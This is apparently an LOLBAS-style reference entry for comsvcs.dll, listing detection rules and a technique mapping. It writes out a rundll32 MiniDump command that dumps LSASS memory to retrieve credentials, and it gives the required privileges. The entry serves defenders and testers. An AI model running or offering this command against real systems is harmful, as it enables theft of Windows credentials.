.. /Comsvcs.dll

Star

Paths:

• c:\windows\system32\comsvcs.dll

Resources:

• https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

Acknowledgements:

• modexp

Detections:

• Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml
• Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml
• Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
• Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml

Dump

1. Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.

   rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full

   Use case

   Dump Lsass.exe process memory to retrieve credentials.

   Privileges required

   SYSTEM

   Operating systems

   Windows 10, Windows 11

   ATT&CK® technique

   T1003.001